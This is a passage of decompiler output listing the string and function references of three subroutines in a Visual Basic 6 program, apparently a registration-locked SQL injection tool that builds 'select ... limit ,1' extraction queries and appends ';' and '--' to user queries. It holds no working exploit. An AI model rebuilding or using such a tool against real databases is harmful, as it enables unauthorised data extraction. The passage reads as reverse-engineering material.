'N  * ref: " limit "
'N  * ref: ",1"
'N  * ref: Subr_677
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCat
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: __vbaVarDup
'N  * ref: " Order by "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: __vbaVarDup
'N  * ref: "Column Data"
'N  * ref: __vbaVarDup
'N  * ref: "select "
'N  * ref: __vbaStrMove
'N  * ref: "."
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrMove
'N  * ref: " from "
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrMove
'N  * ref: "."
'N  * ref: __vbaStrMove
'N  * ref: __vbaVarCat
'N  * ref: " limit "
'N  * ref: ",1"
'N  * ref: Subr_677
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: Subr_188
'N  * ref: "Data Found: "
'N  * ref: "="
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarCopy
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaErrorOverflow
'End Sub
 
'Sub Subr_685()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaStrCopy
'N  * ref: Subr_686
'N  * ref: __vbaStrMove
'N  * ref: Trim(
'N  * ref: Left(
'N  * ref: LCase(
'N  * ref: "select"
'N  * ref: __vbaVarTstEq
'N  * ref: __vbaFreeVarList
'N  * ref: "Please register to activate"
'N  * ref: __vbaVarCopy
'N  * ref: "Please register to activate!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaLenVar
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarDup
'N  * ref: "Query Result"
'N  * ref: __vbaVarDup
'N  * ref: Subr_677
'N  * ref: __vbaVarDup
'N  * ref: IIf(
'N  * ref: __vbaStrCopy
'N  * ref: __vbaVarCat
'N  * ref: ";"
'N  * ref: "--"
'N  * ref: Subr_151
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaInStr
'N  * ref: "Query was done"
'N  * ref: __vbaVarCopy
'N  * ref: "Query failed! (maybe its done?! check it yourself)"
'N  * ref: __vbaVarCopy
'N  * ref: Subr_143
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeStr
'End Sub
 
'Sub Subr_686()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarMove
'N  * ref: __vbaStrCopy
'N  * ref: Asc(
'N  * ref: """"
'N  * ref: "'"
'N  * ref: "'"
'N  * ref: """"
'N  * ref: __vbaVarForInit
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: __vbaInStrVar
'N  * ref: __vbaVarTstGt
'N  * ref: __vbaFreeVarList
'N  * ref: Chr(
'N  * ref: __vbaInStrVar
'N  * ref: __vbaFreeVar
'N  * ref: Chr(
'N  * ref: __vbaVarAdd
'N  * ref: __vbaInStrVar
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarTstEq
'N  * ref: __vbaVarSub
'N  * ref: __vbaVarAdd
'N  * ref: Mid(
'N  * ref: __vbaFreeVar
'N  * ref: __vbaLenVar
'N  * ref: __vbaVarSub
'N  * ref: Mid(
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: Subr_673
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaStrVarVal
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarForNext
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaErrorOverflow
'End Sub
 
